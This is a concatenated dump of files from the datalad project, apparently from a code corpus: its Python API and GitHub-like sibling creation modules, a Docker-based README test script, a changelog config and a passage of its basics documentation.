### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Python DataLad API exposing user-oriented commands (also available via CLI)\"\"\"\n\nimport datalad\nfrom datalad.coreapi import *\n\n\ndef _command_summary():\n # Import here to avoid polluting the datalad.api namespace.\n from collections import defaultdict\n from datalad.interface.base import alter_interface_docs_for_api\n from datalad.interface.base import get_api_name\n from datalad.interface.base import get_cmd_doc\n from datalad.interface.base import get_cmd_summaries\n from datalad.interface.base import get_interface_groups\n from datalad.interface.base import load_interface\n\n groups = get_interface_groups()\n grp_short_descriptions = defaultdict(list)\n for group, _, specs in sorted(groups, key=lambda x: x[1]):\n for spec in specs:\n intf = load_interface(spec)\n if intf is None:\n continue\n sdescr = getattr(intf, \"short_description\", None) or \\\n alter_interface_docs_for_api(get_cmd_doc(intf)).split(\"\\n\")[0]\n grp_short_descriptions[group].append(\n (get_api_name(spec), sdescr))\n return \"\\n\".join(get_cmd_summaries(grp_short_descriptions, groups))\n\n\nif not datalad.in_librarymode():\n __doc__ += \"\\n\\n{}\".format(_command_summary())\n\n\ndef _generate_extension_api():\n \"\"\"Auto detect all available extensions and generate an API from them\n \"\"\"\n from datalad.support.entrypoints import iter_entrypoints\n from datalad.interface.base import (\n get_api_name,\n load_interface,\n )\n\n import logging\n lgr = logging.getLogger('datalad.api')\n\n for ename, _, (grp_descr, interfaces) in iter_entrypoints(\n 'datalad.extensions', load=True):\n for intfspec in interfaces:\n # turn the interface spec into an instance\n intf = load_interface(intfspec[:2])\n if intf is None:\n lgr.error(\n \"Skipping unusable command interface '%s.%s' from extension %r\",\n intfspec[0], intfspec[1], ename)\n continue\n api_name = get_api_name(intfspec)\n if api_name in globals():\n lgr.debug(\n 'Command %s from extension %s is replacing a previously loaded implementation',\n api_name,\n ename)\n globals()[api_name] = intf.__call__\n\n\n_generate_extension_api()\n\n# Be nice and clean up the namespace properly\ndel _generate_extension_api\ndel _command_summary\n" }, { "alpha_fraction": 0.5802277326583862, "alphanum_fraction": 0.5859213471412659, "avg_line_length": 31.200000762939453, "blob_id": "a17d1ea1bcf579b040827c833becd7d0a45c718f", "content_id": "65f58241679da930332a8845d0f637974cf643d0", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1932, "license_type": "permissive", "max_line_length": 89, "num_lines": 60, "path": "/tools/testing/test_README_in_docker", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#emacs: -*- mode: shell-script; c-basic-offset: 4; tab-width: 4; indent-tabs-mode: t -*- \n#ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Helper to generate a Docker instance mapping user uder docker into your USER/UID/GID\n# and allowing to run tox within that clean automatically generated according to\n# README.md's apt-get lines environment\n#\nset -e\n#set -x\nset -u\n\nDL_DIST=$1\n\ntopdir=$(realpath `dirname $0`)\ndockerfile=$topdir/test_README_in_docker-Dockerfile\n# echo \"D: $DL_APT\"\nsed -e \"s,DL_DIST,$DL_DIST,g\" \\\n -e \"s,DL_USER,$USER,g\" \\\n -e \"s,DL_UID,`id -u`,g\" \\\n -e \"s,DL_GID,`id -g`,g\" \\\n -e \"s,DL_GIT_USER_EMAIL,`git config --get user.email`,g\" \\\n -e \"s,DL_GIT_USER_NAME,`git config --get user.name`,g\" \\\n $dockerfile.in >| $dockerfile\n\n#DL_APT=$(grep '^\\(apt-get\\|pip\\)' ./../../README.md)\n\ngrep '^apt-get ' ./../../README.md | sed -e 's|python-{|python{,3}-{|g' \\\n| while read aptline; do\n sed -i -e \"s|\\(\\(.*\\)DL_APT\\(.*\\)\\)|\\2$aptline\\3\\n\\1|g\" $dockerfile\n :\ndone\nsed -e '/DL_APT/d' -i $dockerfile\n\ntag=datalad:test_README_${USER}_$DL_DIST\necho \"I: tag $tag\"\nif docker images | grep -q datalad.*test_README.*$DL_DIST; then\n echo \"I: tag already exists -- skipping rebuilding\"\nelse\n docker build -t $tag -f $dockerfile . #&& rm Dockerfile\n #docker build --no-cache=True -t $tag -f $dockerfile . #&& rm Dockerfile\nfi\n\ntopgitdir=`realpath ${topdir}/../..`\necho \"I: top git dir $topgitdir\"\n\ntox=\"$topgitdir/.tox\"\nif [ -e \"$tox\" ]; then\n echo \"I: removing existing tox under $tox\"\n rm -r $tox\nfi\n\necho \"I: running tox within docker\"\ndocker run -it --rm=true -v $topgitdir:/home/$USER/datalad $tag tox --sitepackages\n" }, { "alpha_fraction": 0.5500243306159973, "alphanum_fraction": 0.5505512952804565, "avg_line_length": 34.854652404785156, "blob_id": "7904e333a98af2572b22bcebc9756b98d1e18970", "content_id": "aa3ebb5af9f2d84e4887bee0b090ad23f2624066", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24668, "license_type": "permissive", "max_line_length": 166, "num_lines": 688, "path": "/datalad/distributed/create_sibling_ghlike.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tooling for creating a publication target on GitHub-like systems\n\"\"\"\n\nimport logging\nimport re\nfrom urllib.parse import (\n urljoin,\n urlparse,\n)\n\nimport requests\n\nfrom datalad import cfg as dlcfg\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n require_dataset,\n)\nfrom datalad.downloaders.credentials import Token\nfrom datalad.downloaders.http import DEFAULT_USER_AGENT\nfrom datalad.interface.common_opts import (\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import get_status_dict\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.ui import ui\nfrom datalad.utils import todo_interface_for_extensions\n\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_ghlike')\n\n\nclass _GitHubLike(object):\n \"\"\"Helper class with a platform abstraction for GitHub-like services\n \"\"\"\n # (short) lower-case name of the target platform\n name = None\n # (longer) name with fancy capitalization\n fullname = None\n # all API endpoint without base URL!\n # to create a repo in an organization\n create_org_repo_endpoint = None\n # to create a repo under the authenticated user\n create_user_repo_endpoint = None\n # query for props of the authenticated users\n get_authenticated_user_endpoint = None\n # query for repository properties\n get_repo_info_endpoint = None\n # HTTP response codes for particular events\n # repo created successfully\n response_code_repo_created = requests.codes.created\n # auth failure\n response_code_unauthorized = requests.codes.forbidden\n\n # extra config settings to be used for a remote pointing to the\n # target platform\n extra_remote_settings = {}\n\n # to be used (in modified form) by create_sibling_*() commands that\n # utilize this platform abstraction\n create_sibling_params = dict(\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"dataset to create the publication target for. If not given,\n an attempt is made to identify the dataset based on the current\n working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n reponame=Parameter(\n args=('reponame',),\n metavar='[<org-name>/]<repo-(base)name>',\n doc=\"\"\"repository name, optionally including an '<organization>/'\n prefix if the repository shall not reside under a user's namespace.\n When operating recursively, a suffix will be appended to this name\n for each subdataset\"\"\",\n constraints=EnsureStr()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name of the sibling in the local dataset installation\n (remote name)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice(\n 'skip', 'error', 'reconfigure'),\n doc=\"\"\"behavior when already existing or configured\n siblings are discovered: skip the dataset ('skip'), update the\n configuration ('reconfigure'), or fail ('error').\"\"\",),\n credential=Parameter(\n args=('--credential',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='NAME',\n doc=\"\"\"name of the credential providing a personal access token\n to be used for authorization. The token can be supplied via\n configuration setting 'datalad.credential.<name>.token', or\n environment variable DATALAD_CREDENTIAL_<NAME>_TOKEN, or will\n be queried from the active credential store using the provided\n name. If none is provided, the host-part of the API URL is used\n as a name (e.g. 'https://api.github.com' -> 'api.github.com')\"\"\"),\n api=Parameter(\n args=('--api',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='URL',\n # TODO consider default instance via config\n doc=\"\"\"API endpoint of the Git hosting service instance\"\"\"),\n access_protocol=Parameter(\n args=(\"--access-protocol\",),\n constraints=EnsureChoice('https', 'ssh', 'https-ssh'),\n doc=\"\"\"access protocol/URL to configure for the sibling. With\n 'https-ssh' SSH will be used for write access, whereas HTTPS\n is used for read access.\"\"\"),\n description=Parameter(\n args=(\"--description\",),\n doc=\"\"\"Brief description, displayed on the project's page\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n publish_depends=publish_depends,\n private=Parameter(\n args=(\"--private\",),\n action=\"store_true\",\n default=False,\n doc=\"\"\"if set, create a private repository\"\"\"),\n dry_run=Parameter(\n args=(\"--dry-run\",),\n action=\"store_true\",\n doc=\"\"\"if set, no repository will be created, only tests for\n sibling name collisions will be performed, and would-be repository\n names are reported for all relevant datasets\"\"\"),\n )\n\n def __init__(self, url, credential, require_token=True, token_info=None):\n if self.name is None or self.fullname is None:\n raise NotImplementedError(\n 'GitHub-like platform must have name and fullname properties')\n if not url:\n raise ValueError(f'API URL required for {self.fullname}')\n\n self.api_url = url\n self._user_info = None\n self._set_request_headers(\n credential,\n f'An access token is required for {url}' \\\n + f'. {token_info}' if token_info else '',\n require_token,\n )\n self._set_extra_remote_settings()\n\n def _set_extra_remote_settings(self):\n target_name = urlparse(self.api_url).netloc\n config_section = \"datalad.create-sibling-ghlike.extra-remote-settings.{}\".format(target_name)\n target_specific_settings = {\n option: dlcfg.get_value(config_section, option)\n for option in dlcfg.options(config_section)\n }\n self.extra_remote_settings = {\n **self.extra_remote_settings,\n **target_specific_settings,\n }\n\n @todo_interface_for_extensions\n def _set_request_headers(self, credential_name, auth_info, require_token):\n if credential_name is None:\n credential_name = urlparse(self.api_url).netloc\n\n try:\n self.auth = Token(credential_name)(\n instructions=auth_info)['token']\n except Exception as e:\n lgr.debug('Token retrieval failed: %s', e)\n lgr.warning(\n 'Cannot determine authorization token for %s', credential_name)\n if require_token:\n raise ValueError(\n f'Authorization required for {self.fullname}, '\n f'cannot find token for a credential {credential_name}.')\n else:\n lgr.warning(\"No token found for credential '%s'\", credential_name)\n self.auth = 'NO-TOKEN-AVAILABLE'\n\n self.request_headers = {\n 'user-agent': DEFAULT_USER_AGENT,\n 'authorization': f'token {self.auth}',\n }\n\n @property\n def authenticated_user(self):\n \"\"\"Lazy query/reporting of properties for the authenticated user\n\n Returns\n -------\n dict\n \"\"\"\n if self._user_info:\n return self._user_info\n\n endpoint = urljoin(self.api_url, self.get_authenticated_user_endpoint)\n headers = self.request_headers\n r = requests.get(endpoint, headers=headers)\n # make sure any error-like situation causes noise\n r.raise_for_status()\n self._user_info = r.json()\n return self._user_info\n\n # TODO what are the actual constraints?\n def normalize_reponame(self, path):\n \"\"\"Turn name into a GitHub-like service compliant repository name\n\n Useful for sanitizing directory names.\n \"\"\"\n return re.sub(r'\\s+', '_', re.sub(r'[/\\\\]+', '-', path))\n\n def get_dataset_reponame_mapping(\n self, ds, name, reponame, existing, recursive, recursion_limit,\n res_kwargs):\n \"\"\"Discover all relevant datasets locally, and build remote repo names\n \"\"\"\n dss = _get_present_datasets(ds, recursive, recursion_limit)\n # check for existing remote configuration\n toprocess = []\n toyield = []\n for d in dss:\n if existing not in ('reconfigure', 'replace') and \\\n name in d.repo.get_remotes():\n toyield.append(get_status_dict(\n ds=d,\n status='error' if existing == 'error' else 'notneeded',\n message=('already has a configured sibling \"%s\"', name),\n **res_kwargs)\n )\n continue\n gh_reponame = reponame if d == ds else \\\n '{}-{}'.format(\n reponame,\n self.normalize_reponame(\n str(d.pathobj.relative_to(ds.pathobj))))\n toprocess.append((d, gh_reponame))\n return toprocess, toyield\n\n def get_siblingname(self, siblingname):\n \"\"\"Generate a (default) sibling name, if none is given\n\n Returns\n -------\n str\n \"\"\"\n if siblingname:\n return siblingname\n\n if self.api_url:\n siblingname = urlparse(self.api_url).netloc\n\n if not siblingname:\n raise ValueError(\n 'No valid sibling name given or determined: {}'.format(\n siblingname))\n\n return siblingname\n\n def create_repo(self, ds, reponame, organization, private, dry_run,\n description, existing):\n \"\"\"Create a repository on the target platform\n\n Returns\n -------\n dict\n Result record, with status='ok' when all is good, status='error'\n when unrecoverably broken, status='impossible' when recoverably\n broken\n\n Raises\n ------\n Exception\n Any unhandled condition (in particular unexpected non-success\n HTTP response codes) will raise an exception.\n \"\"\"\n res = self.repo_create_request(\n reponame, organization, private, dry_run, description)\n\n if res.get('status') == 'impossible' and res.get('preexisted'):\n # we cannot create, because there is something in the target\n # spot\n orguser = organization or self.authenticated_user['login']\n\n if existing == 'reconfigure':\n # we want to use the existing one instead\n # query properties, report, and be done\n repo_props = self.repo_get_request(orguser, reponame)\n res.update(\n status='notneeded',\n # return in full\n host_response=repo_props,\n # perform some normalization\n **self.normalize_repo_properties(repo_props)\n )\n elif existing == 'replace':\n # only implemented for backward compat with\n # create-sibling-github\n _msg = ('repository \"%s\" already exists', reponame)\n if ui.is_interactive:\n remove = ui.yesno(\n \"Do you really want to remove it?\",\n title=_msg[0] % _msg[1],\n default=False\n )\n else:\n return dict(\n res,\n status='impossible',\n message=(\n _msg[0] + \" Remove it manually first or \"\n \"rerun DataLad in an interactive shell \"\n \"to confirm this action.\",\n _msg[1]),\n )\n if not remove:\n return dict(\n res,\n status='impossible',\n message=_msg,\n )\n # remove the beast in cold blood\n self.repo_delete_request(\n organization or self.authenticated_user['login'],\n reponame)\n # try creating now\n return self.create_repo(\n ds, reponame, organization, private, dry_run,\n description, existing)\n\n # TODO intermediate error handling?\n\n return res\n\n def repo_get_request(self, orguser, reponame):\n \"\"\"Perform request to query for repo properties\n\n Returns\n -------\n dict\n The JSON payload of the response.\n \"\"\"\n # query information on the existing repo and use that\n # to complete the task\n r = requests.get(\n urljoin(\n self.api_url,\n self.get_repo_info_endpoint.format(\n user=orguser,\n repo=reponame)),\n headers=self.request_headers,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n return r.json()\n\n def repo_delete_request(self, orguser, reponame):\n \"\"\"Perform request to delete a named repo on the platform\n\n Must be implemented in subclasses for particular target platforms.\n \"\"\"\n raise NotImplementedError\n\n def create_repos(self, dsrepo_map, siblingname, organization,\n private, dry_run, description, res_kwargs,\n existing, access_protocol,\n publish_depends):\n \"\"\"Create a series of repos on the target platform\n\n This method handles common conditions in a uniform platform-agnostic\n fashion, and sets local sibling configurations for created/located\n repositories.\n\n Yields\n ------\n dict\n Result record\n \"\"\"\n for d, reponame in dsrepo_map:\n res = self.create_repo(\n d, reponame, organization, private, dry_run, description,\n existing)\n # blend reported results with standard properties\n res = dict(\n res,\n **res_kwargs)\n\n if res.get('preexisted') and existing == 'skip':\n # we came here, despite initial checking for conflicting\n # sibling names. this means we found an unrelated repo\n res['status'] = 'error'\n res['message'] = (\n \"A repository '%s' already exists at '%s', \"\n \"use existing=reconfigure to use it as a sibling\",\n reponame, self.api_url)\n\n if 'message' not in res:\n if not dry_run:\n res['message'] = (\n \"sibling repository '%s' created at %s\",\n siblingname, res.get('html_url')\n )\n else:\n # can't know url when request was not made\n res['message'] = (\n \"would create sibling '%s' and repository '%s%s'\",\n siblingname,\n organization + \"/\" if organization else \"\",\n reponame\n )\n # report to caller\n yield get_status_dict(**res)\n\n if res['status'] not in ('ok', 'notneeded'):\n # something went wrong, do not proceed\n continue\n\n if dry_run:\n continue\n\n if res['status'] == 'notneeded' \\\n and existing not in ('reconfigure', 'replace'):\n # nothing to do anymore, when no reconfiguration is desired\n continue\n\n # lastly configure the local datasets\n for var_name, var_value in \\\n self.extra_remote_settings.items():\n var = 'remote.{}.{}'.format(siblingname, var_name)\n if existing in ('reconfigure', 'replace'):\n d.config.set(var, var_value, scope='local')\n elif var not in d.config:\n d.config.add(var, var_value, scope='local')\n yield from d.siblings(\n 'configure',\n name=siblingname,\n url=res['ssh_url']\n if access_protocol == 'ssh'\n else res['clone_url'],\n pushurl=res['ssh_url']\n if access_protocol == 'https-ssh' else None,\n recursive=False,\n # TODO fetch=True, maybe only if one existed already\n publish_depends=publish_depends,\n return_type='generator',\n result_renderer='disabled')\n\n def repo_create_request(self, reponame, organization, private,\n dry_run=False, description=None):\n \"\"\"Perform a request to create a repo on the target platform\n\n Also implements reporting of \"fake\" results in dry-run mode.\n\n Returns\n -------\n dict\n Result record, but see repo_create_response() for details.\n \"\"\"\n endpoint = urljoin(\n self.api_url,\n self.create_org_repo_endpoint.format(\n organization=organization)\n if organization else\n self.create_user_repo_endpoint)\n desc_text = description if description is not None else 'some default'\n data = {\n 'name': reponame,\n 'description': desc_text,\n 'private': private,\n 'auto_init': False,\n }\n headers = self.request_headers\n\n if dry_run:\n return dict(\n status='ok',\n request_url=endpoint,\n request_data=data,\n request_headers=headers,\n )\n r = requests.post(\n endpoint,\n json=data,\n headers=headers,\n )\n return self.repo_create_response(r)\n\n def repo_create_response(self, r):\n \"\"\"Handling of repo creation request responses\n\n Normalizes error handling and reporting.\n\n Returns\n -------\n dict\n Result record\n\n Raises\n ------\n Exception\n Raises for any unhandled HTTP error response code.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == self.response_code_repo_created:\n return dict(\n status='ok',\n preexisted=False,\n # return in full\n host_response=response,\n # perform some normalization\n **self.normalize_repo_properties(response)\n )\n elif r.status_code == requests.codes.unprocessable and \\\n 'already exist' in response.get('message', ''):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code in (self.response_code_unauthorized,\n requests.codes.forbidden):\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n elif r.status_code == requests.codes.internal_server_error:\n return dict(\n status='error',\n message=response.get('message', '').strip() or 'Server returned error code %d without any further information' % requests.codes.internal_server_error,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n def normalize_repo_properties(self, response):\n \"\"\"Normalize the essential response properties for the result record\n\n Importantly, `clone_url` is a URL that DataLad can directly clone\n from, and that should be the default preferred access method for read\n access by the largest possible audience. Critically, a particular\n platform, might advertise SSH as default, but DataLad might promote\n anonymous HTTP-access as a default, if supported.\n\n Returns\n -------\n dict\n \"\"\"\n return dict(\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n )\n\n\ndef _create_sibling(\n platform,\n reponame,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n \"\"\"Helper function to conduct sibling creation on a target platform\n\n Parameters match the respective create_sibling_*() commands.\n `platform` is an instance of a subclass of `_GitHubLike`.\n\n Yields\n ------\n dict\n Result record.\n \"\"\"\n\n orgname, reponame = split_org_repo(reponame)\n\n # apply whatever normalization or default selection\n name = platform.get_siblingname(name)\n\n lgr.debug(\"Repository organization name: '%s'\", orgname)\n\n if reponame != platform.normalize_reponame(reponame):\n raise ValueError(\n f'Invalid name for a {platform.fullname} project: {reponame}')\n\n lgr.debug(\"Repository basename: '%s'\", reponame)\n\n # what to operate on\n ds = require_dataset(\n dataset,\n check_installed=True,\n purpose=f'create {platform.fullname} sibling(s)')\n\n res_kwargs = dict(\n action=\\\n f'create_sibling_{platform.name} [dry-run]'\n if dry_run else\n f'create_sibling_{platform.name}',\n logger=lgr,\n refds=ds.path,\n )\n\n toprocess, filterresults = platform.get_dataset_reponame_mapping(\n ds, name, reponame, existing, recursive, recursion_limit,\n res_kwargs\n )\n yield from filterresults\n\n if not toprocess:\n # all skipped\n return\n\n lgr.debug(\"Will process %i dataset(s)\", len(toprocess))\n\n yield from platform.create_repos(\n toprocess,\n name,\n orgname,\n private,\n dry_run,\n description,\n res_kwargs,\n existing,\n access_protocol,\n publish_depends,\n )\n\n\ndef split_org_repo(name):\n \"\"\"Split a potential organization name prefix from a repo's full name\n\n Returns\n -------\n (None, reponame) or (orgname, reponame)\n \"\"\"\n split = name.split('/', maxsplit=1)\n if len(split) < 2:\n return None, name\n else:\n return split[0], split[1]\n\n\ndef _get_present_datasets(ds, recursive, recursion_limit):\n \"\"\"Return list of (sub)dataset instances for all locally present datasets\n \"\"\"\n # gather datasets and essential info\n # dataset instance and mountpoint relative to the top\n toprocess = [ds]\n if recursive:\n for sub in ds.subdatasets(\n # we want to report on missing dataset in here\n state='any',\n recursive=recursive,\n recursion_limit=recursion_limit,\n result_xfm='datasets',\n result_renderer='disabled',\n return_type='generator'):\n if not sub.is_installed():\n lgr.info('Ignoring unavailable subdataset %s', sub)\n continue\n toprocess.append(sub)\n return toprocess\n" }, { "alpha_fraction": 0.5525059700012207, "alphanum_fraction": 0.5620524883270264, "avg_line_length": 31.230770111083984, "blob_id": "f689e8954cec54603454267d7bdb72b216acc193", "content_id": "b8464169d243a1a281a9d7aeeb3ab7017973ec78", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 838, "license_type": "permissive", "max_line_length": 92, "num_lines": 26, "path": "/datalad/version.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# Compatibility kludge for now to not break anything relying on datalad.version\n#\n\nimport warnings\n\nfrom ._version import get_versions\n\nwarnings.warn(\n \"datalad.version module will be removed in 0.16. \"\n \"Please use datalad.__version__ (no other __*_version__ variables are to be provided).\",\n DeprecationWarning)\n\n__version__ = get_versions()['version']\n__hardcoded_version__ = __version__\n__full_version__ = __version__\n\ndel get_versions\n" }, { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7679426074028015, "avg_line_length": 51.25, "blob_id": "a7e57506e584d08ab52a6bc83fc0444000024926", "content_id": "8d1b4c1cbf91a3fd15623c97ac7c3ff50e571bd2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 442, "license_type": "permissive", "max_line_length": 146, "num_lines": 8, "path": "/changelog.d/scriv.ini", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "[scriv]\nfragment_directory = changelog.d\nentry_title_template = file: templates/entry_title.md.j2\nnew_fragment_template = file: templates/new_fragment.md.j2\nformat = md\n# The categories must align with the category names in SEMVER_LABELS in\n# tools/ci/mkchlog-snippet.py\ncategories = 💥 Breaking Changes, 🚀 Enhancements and New Features, 🐛 Bug Fixes, 🔩 Dependencies, 📝 Documentation, 🏠 Internal, 🏎 Performance, 🧪 Tests\n" }, { "alpha_fraction": 0.7425722479820251, "alphanum_fraction": 0.7434880137443542, "avg_line_length": 47.89552307128906, "blob_id": "c5506768dfbd3cb1283b72f1d6c0b3af4f840463", "content_id": "0d627b76910b9fc2eac513d3fddea3389046bc17", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 9828, "license_type": "permissive", "max_line_length": 95, "num_lines": 201, "path": "/docs/source/basics.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_basic_principles:\n\n****************\nBasic principles\n****************\n\nDataLad is designed to be used both as a command-line tool, and as a Python\nmodule. The sections :ref:`chap_cmdline` and :ref:`chap_modref` provide\ndetailed description of the commands and functions of the two interfaces. This\nsection presents common concepts. Although examples will frequently be\npresented using command line interface commands, all functionality with\nidentically named functions and options are available through Python API as\nwell.\n\nDatasets\n========\n\nA DataLad :term:`dataset` is a Git repository that may or may not have a data\n:term:`annex` that is used to manage data referenced in a dataset. In practice,\nmost DataLad datasets will come with an annex.\n\nTypes of IDs used in datasets\n-----------------------------\n\nFour types of unique identifiers are used by DataLad to enable identification\nof different aspects of datasets and their components.\n\nDataset ID\n A UUID that identifies a dataset as a whole across its entire history and\n flavors. This ID is stored in a dataset's own configuration file\n (``<dataset root>/.datalad/config``) under the configuration key\n ``datalad.dataset.id``.\n As this configuration is stored in a file that is part of the Git history of\n a dataset, this ID is identical for all \"clones\" of a dataset and across all\n its versions. If the purpose or scope of a dataset changes enough to warrant\n a new dataset ID, it can be changed by altering the dataset configuration\n setting.\nAnnex ID\n A UUID assigned to an annex of each individual clone of a dataset repository.\n Git-annex uses this UUID to track file content availability information. The\n UUID is available under the configuration key ``annex.uuid`` and is stored\n in the configuration file of a local clone (``<dataset root>/.git/config``).\n A single dataset instance (i.e. clone) can only have a single annex UUID,\n but a dataset with multiple clones will have multiple annex UUIDs.\nCommit ID\n A Git hexsha or tag that identifies a version of a dataset. This ID uniquely\n identifies the content and history of a dataset up to its present state. As\n the dataset history also includes the dataset ID, a commit ID of a DataLad\n dataset is unique to a particular dataset.\nContent ID\n Git-annex key (typically a checksum) assigned to the content of a file in\n a dataset's annex. The checksum reflects the content of a file, not its name.\n Hence the content of multiple identical files in a single (or across)\n dataset(s) will have the same checksum. Content IDs are managed by Git-annex\n in a dedicated ``annex`` branch of the dataset's Git repository.\n\n\nDataset nesting\n---------------\n\nDatasets can contain other datasets (:term:`subdataset`\\s), which can in turn\ncontain subdatasets, and so on. There is no limit to the depth of nesting\ndatasets. Each dataset in such a hierarchy has its own annex and its own\nhistory. The parent or :term:`superdataset` only tracks the specific state of a\nsubdataset, and information on where it can be obtained. This is a powerful yet\nlightweight mechanism for combining multiple individual datasets for a specific\npurpose, such as the combination of source code repositories with other\nresources for a tailored application. In many cases DataLad can work with a\nhierarchy of datasets just as if it were a single dataset. Here is a demo:\n\n.. include:: basics_nesteddatasets.rst.in\n :start-after: Let's create a dataset\n :end-before: ___________________________\n\n\nDataset collections\n-------------------\n\nA superdataset can also be seen as a curated collection of datasets, for example,\nfor a certain data modality, a field of science, a certain author, or from\none project (maybe the resource for a movie production). This lightweight\ncoupling between super and subdatasets enables scenarios where individual datasets\nare maintained by a disjoint set of people, and the dataset collection itself can\nbe curated by a completely independent entity. Any individual dataset can be\npart of any number of such collections.\n\nBenefiting from Git's support for workflows based on decentralized \"clones\" of\na repository, DataLad's datasets can be (re-)published to a new location\nwithout losing the connection between the \"original\" and the new \"copy\". This\nis extremely useful for collaborative work, but also in more mundane scenarios\nsuch as data backup, or temporary deployment of a dataset on a compute cluster,\nor in the cloud. Using git-annex, data can also get synchronized across\ndifferent locations of a dataset (:term:`sibling`\\s in DataLad terminology).\nUsing metadata tags, it is even possible to configure different levels of\ndesired data redundancy across the network of dataset, or to prevent\npublication of sensitive data to publicly accessible repositories. Individual\ndatasets in a hierarchy of (sub)datasets need not be stored at the same location.\nContinuing with an earlier example, it is possible to post a curated\ncollection of datasets, as a superdataset, on GitHub, while the actual datasets\nlive on different servers all around the world.\n\nBasic command line usage\n========================\n\n.. include:: basics_cmdline.rst.in\n :end-before: ___________________________\n\n\nAPI principles\n==============\n\nYou can use DataLad's ``install`` command to download datasets. The command accepts\nURLs of different protocols (``http``, ``ssh``) as an argument. Nevertheless, the easiest way\nto obtain a first dataset is downloading the default :term:`superdataset` from\nhttps://datasets.datalad.org/ using a shortcut.\n\nDownloading DataLad's default superdataset\n--------------------------------------------\n\nhttps://datasets.datalad.org provides a super-dataset consisting of datasets\nfrom various portals and sites. Many of them were crawled, and periodically\nupdated, using `datalad-crawler <https://github.com/datalad/datalad-crawler>`__\nextension. The argument ``///`` can be used\nas a shortcut that points to the superdataset located at https://datasets.datalad.org/. \nHere are three common examples in command line notation:\n\n``datalad install ///``\n installs this superdataset (metadata without subdatasets) in a\n `datasets.datalad.org/` subdirectory under the current directory\n``datalad install -r ///openfmri``\n installs the openfmri superdataset into an `openfmri/` subdirectory.\n Additionally, the ``-r`` flag recursively downloads all metadata of datasets \n available from http://openfmri.org as subdatasets into the `openfmri/` subdirectory\n``datalad install -g -J3 -r ///labs/haxby``\n installs the superdataset of datasets released by the lab of Dr. James V. Haxby\n and all subdatasets' metadata. The ``-g`` flag indicates getting the actual data, too.\n It does so by using 3 parallel download processes (``-J3`` flag).\n\n\nDownloading datasets via http\n-----------------------------\n\nIn most places where DataLad accepts URLs as arguments these URLs can be\nregular ``http`` or ``https`` protocol URLs. For example:\n\n``datalad install https://github.com/psychoinformatics-de/studyforrest-data-phase2.git``\n\nDownloading datasets via ssh\n----------------------------\nDataLad also supports SSH URLs, such as ``ssh://me@localhost/path``.\n\n``datalad 